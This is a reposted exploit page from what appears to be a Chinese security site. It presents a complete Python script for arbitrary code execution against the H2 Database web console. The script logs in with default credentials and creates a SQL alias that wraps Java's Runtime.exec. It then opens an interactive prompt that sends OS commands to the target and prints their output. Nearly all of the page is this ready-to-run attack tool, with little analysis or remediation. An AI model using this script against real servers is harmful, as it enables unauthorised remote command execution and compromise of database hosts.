首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 H2 Database - 'Alias' Arbitrary Code Execution 来源：https://mthbernardes.github.io/ 作者：gambler 发布时间：2018-04-10   ''' Exploit Title: H2 Database Alias Abuse Date: 05/04/2018 Exploit Author: gambler Vendor Homepage:www.h2database.com Software Link: http://www.h2database.com/html/download.html Version: all versions Tested on: Linux, Mac OS '''   import sys import argparse import html import requests   # Blogpost about it # https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html   def getCookie(host):     url = 'http://{}'.format(host)     r = requests.get(url)     path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp','.do')     return '{}/{}'.format(url,path)   def login(url,user,passwd,database):     data = {'language':'en','setting':'Generic+H2+(Embedded)','name':'Generic+H2+(Embedded)','driver':'org.h2.Driver','url':database,'user':user,'password':passwd}     r = requests.post(url,data=data)     if '<th class="login">Login</th>' in r.text:         return False     return True   def prepare(url):     cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : "";  }$$;'''     url = url.replace('login','query')     r = requests.post(url,data={'sql':cmd})     if not 'Syntax error' in r.text:         return url     return False   def execve(url,cmd):     r = requests.post(url,data={'sql':"CALL EXECVE('{}')".format(cmd)})     try:         print(html.unescape(r.text.split('</th></tr><tr><td>')[1].split('</td>')[0].replace('<br />','\n').replace('&nbsp;',' ')).encode('utf-8').decode('utf-8','ignore'))     except Exception as e:         print('Something goes wrong')         print(e)   if __name__ == "__main__":     parser = argparse.ArgumentParser()     required = parser.add_argument_group('required arguments')     required.add_argument("-H",             "--host",             metavar='127.0.0.1:4336',             help="Specify a host",             required=True)     required.add_argument("-d",             "--database-url",             metavar='jdbc:h2~/test',             default="jdbc:h2~/test",             help="Database URL",             required=False)     required.add_argument("-u",             "--user",             metavar='username',             default="sa",             help="Username to log on H2 Database, default sa",             required=False)     required.add_argument("-p",             "--password",             metavar='password',             default="",             help="Password to log on H2 Database, default None",             required=False)     args = parser.parse_args()   url = getCookie(args.host) if login(url,args.user,args.password,args.database_url):     url = prepare(url)     if url:         while 1:             try:                 cmd = input('cmdline@ ')                 execve(url,cmd)             except KeyboardInterrupt:                 print("\nProfessores ensinam, nadadores Nadam e Hackers Hackeiam")                 sys.exit(0)     else:         print('ERROR - Inserting Payload')         print("Something goes wrong, exiting...") else:     print("ERROR - Auth")     print("Something goes wrong, exiting...")   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·SSH / SSL RSA Private Key Pass ·GoldWave 5.70 - Local Buffer O ·Adobe Flash 28.0.0.137 Remote ·CyberArk Password Vault < 9.7 ·PMS 0.42 Stack-Based Buffer Ov ·CyberArk Password Vault Web Ac ·Sophos Endpoint Protection Con ·DVD X Player Standard 5.5.3.9 ·Sophos Endpoint Protection 10. ·Google Chrome V8 JIT - 'LoadEl ·Microsoft Windows - Multiple U ·SysGauge Pro 4.6.12 Local Buff   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved